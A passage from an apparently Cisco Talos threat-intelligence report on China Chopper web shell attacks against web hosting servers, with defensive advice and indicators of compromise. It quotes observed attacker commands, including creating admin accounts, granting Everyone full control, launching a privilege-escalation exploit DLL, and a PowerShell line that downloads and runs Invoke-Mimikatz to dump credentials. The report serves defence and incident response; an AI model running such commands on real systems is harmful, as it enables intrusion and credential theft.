typos: missed spaces, wrong commands or letters switching. \n \nOne of the actors successfully acquired the credentials and tried to pivot internally by using the credentials and the \"net use\" commands. \n \nFinally, several remote access tools such as [Gh0stRAT](<https://blog.talosintelligence.com/2019/06/threat-roundup-0607-0614.html>) and Venom multi-hop proxy were deployed on the machine, as well as a remote shell written purely in PowerShell. \n \n\n\n### Case No. 3: Web hosting providers compromised\n\nIn one campaign, we discovered an Asian web-hosting provider under attack, with the most significant compromise spanning several Windows servers over a period of 10 months. Once again, we cannot be sure if this was a single actor or multiple groups, since the activities differ depending on the attacked server. We show just a subset of observed activities. \n\n\n#### Server 1\n\nGenerally, the attackers seek to create a new user and then add the user to the group of users with administrative privileges, presumably to access and modify other web applications hosted on a single physical server. \n \n\n \n \n cd /d C:\\compromisedappdirectory&net user user pass /add \n cd /d C:\\compromisedappdirectory&net localgroup administrattors user /add\n\n \nNotice the misspelling of the word \"administrators.\" The actor realizes that the addition of the user was not successful and attempts a different technique. They download and install an archive containing executables and trivially modified source code of the password-stealing tool \"[Mimikatz Lite](<https://github.com/infosecsmith/MimikatzLite>)\" as GetPassword.exe. \n \nThe tool investigates the Local Security Authority Subsystem memory space in order to find, decrypt and display retrieved passwords. The only change, compared with the original tool is that actors change the color and the code page of the command window. The color is changed so that green text is displayed on a black background and the active console code page is changed to the Chinese code page 936. \n \nFinally, the actor attempts to dump the database of a popular mobile game \"Clash of Kings,\" possibly hosted on a private server. \n\n\n#### Server 2\n\nAn actor successfully tested China Chopper on a second server and stopped the activity. However, we also found another Monero cryptocurrency miner just as we found commodity malware on other systems compromised with China Chopper. \n \nThe actors first reset the Access Control List for the Windows temporary files folder and take ownership of the folder. They then allow the miner executable through the Windows Firewall and finally launch the mining payload. \n \n\n \n \n C:\\Windows\\system32\\icacls.exe C:\\Windows\\Temp /Reset /T \n C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\Temp \n C:\\Windows\\system32\\netsh.exe Firewall Add AllowedProgram C:\\Windows\\Temp\\lsass.eXe Windows Update Enable \n C:\\Windows\\Temp\\lsass.eXe\n\n#### Server 3\n\nThe attack on this server starts by downloading a number of public and private tools, though we were not able to retrieve them. \n \nThe actor attempts to exploit [CVE-2018\u20138440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>) \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified [proof-of-concept exploit](<https://github.com/GossiTheDog/zeroday>). \n \n\n \n \n cd /d C:\\directoryofcompromisedapp&rundll32 C:\\directoryofcompromisedapp\\ALPC-TaskSched-LPE.dll,a\n\n \nThe attacker launches several custom tools and an available tool that attempts to create a new user iis_uses and change DACLs to allow the users to modify certain operating system objects. \n \nThe attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server. This is likely done to compromise other sites or to run a web defacement campaign. \n \n\n \n \n cacls \\. C:\\path_to_a_website /T /E /C /G Everyone:F\n\n \nFinally, the actor attempts to launch Powershell Mimikatz loader to get more credentials from memory and save the credentials into a text file: \n \n\n \n \n powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz|Out-File \n -Encoding ASCII outputfile.txt\n\n \n\n\n#### Server 4\n\nThe China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities [CVE-2015-0062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2015-0062>), [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2015-1701>) and [CVE-2016-0099](<https://www.cvedetails.com/cve/CVE-2016-0099/>) to allow the attacker to modify other objects on the server. \n \nOnce the privilege escalation was successful, the actor adds a new user account and adds the account to the administrative group. \n \n\n \n \n net user admin admin /ad \n net localgroup administrators admin /ad\n\n \nThe attacker next logs on to the server with a newly created user account and launches a free tool replacestudio32.exe, a GUI utility that easily searches through text-based files and performs replacement with another string. Once again, this could be used to affect all sites hosted on the server or simply deface pages. \n \n\n\n### Conclusion\n\nInsecure web applications provide an effective entry point for attackers and allow them to install additional tools such as web shells, conduct reconnaissance and pivot to other systems. \n \nAlthough China Chopper is an old tool, we still see it being used by attackers with various goals and skill levels and in this post we showed some of the common tools, techniques and processes employed in three separate breaches. Because it is so easy to use, it's impossible to confidently connect it to any particular actor or group. \n \nIn our research we documented three separate campaigns active over a period of several months. This corroborates the claim that an average time to detect an intrusion is [over 180 day](<https://www.cisco.com/c/m/en_uk/campaigns/breach-readiness-and-response/index.html>)s and implies that defenders should approach building their security teams and processes around an assumption that the organization has already been breached. It is crucial that an incident response team should have a permission to proactively hunt for breaches, not only to respond to alerts raised by automated detection systems or escalated by the first line security analysts. \n \nWhen securing the infrastructure it is important to keep internal as well as external facing web servers, applications, and frameworks up to date with the latest security patches to mitigate risk of compromise with already known exploits. \n \nDespite the age, China Chopper is here to stay, and we will likely see it in the wild going forward. \n \n\n\n## Coverage\n\nIntrusion prevention systems such as [SNORT\u00ae](<https://snort.org/>) provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as [Cisco AMP for Endpoints](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>), which gives users the ability to track process invocation and inspect processes. Try AMP for free [here](<http://cisco.com/go/tryamp>). \n \nAdditional ways our customers can detect and block these threats are listed below. \n \n\n\n[](<https://1.bp.blogspot.com/-yUCBqjJUM8M/XVF7-jm_JLI/AAAAAAAAAT8/hhCfba_JHMUia21PuHBNSgH416W1Gc9KwCLcBGAs/s1600/image6.png>)\n\n \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ ](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)[Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n\n\n## IOCs\n\n### China Chopper clients\n\n9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a \nc5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef \nb84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07 \n58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc \n \n\n\n### Case study 1\n\n#### Files\n\nb1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 - downloader \nfe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 - proxy \n28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 - downloader dll \nc9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e - nbtscan tool \ndbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c - Miner \n\n\n#### Legitimate tools\n\nd76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 - rar \n46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd - renamed rar \n96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 - renamed rar \n\n\n#### IP addresses\n\n69.165.64.100 \n59.188.255.184 \n154.211.12.153 \n185.234.218.248 \n\n\n### Case study 2\n\n#### Files\n\n02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 - Gandcrab loader \n1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 - Gandcrab \n219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 - Miner/dropper \n4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 - massscan dropped by the miner \na06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb - remote exploit \n919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a - multihop Venom proxy \n\n\n#### URLs\n\nhxxp://101.78.142.74:8001/xavg/javae[.]exe \nhxxp://107.181.160.197/win/3p/checking[.]ps1 \nhxxp://107.182.28.64/t0[.]txt \nhxxp://139.180.199.167:1012/update[.]ps1 \nhxxp://172.96.241.10:80/a \nhxxp://185.228.83.51/config[.]c \nhxxp://188.166.74.218/radm[.]exe \nhxxp://188.166.74.218/untitled[.]exe \nhxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://202.144.193.177/1[.]ps1 \nhxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://is.gd/oeoFuI \nhxxps://pastebin.com/raw/Hd7BmJ33 \nhxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1 \nhxxp://fid.hognoob.se/download[.]exe \nhxxp://107.182.28.64/t0[.]txt \nhxxp://uio.hognoob.se:63145/cfg[.]ini \nhxxp://fid.hognoob.se/HidregSvc[.]exe \nhxxp://188.166.74.218/untitled[.]exe \nhxxp://45.55.211.79/.cache/untitled[.]exe \nhxxp://188.166.74.218/untitled[.]exe \n \n\n\n#### IP Addresses\n\n185.234.218.248 \n \n\n\n### Case study 3\n\n#### Files:\n\nfe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 - Mini Mimikatz archive \n2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 - CVE-2015-0062 \nf3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 - CVE-2015-1701/CVE-2016-0099 \nb46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab - a tool for adding and elevating a user \nab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f - ACLs editing for defaced sites \n\n\n#### Legitimate Tools:\n\nee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 - Replace Studio \nd1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 - part of Replace Studio \n \n", "modified": "2019-08-27T08:14:42", "published": "2019-08-27T08:14:42", "id": "TALOSBLOG:62B868C1729207FF4ED156D86237FD03", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/woKZ9ObRF9g/china-chopper-still-active-9-years-later.html", "type": "talosblog", "title": "China Chopper still active 9 years later", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}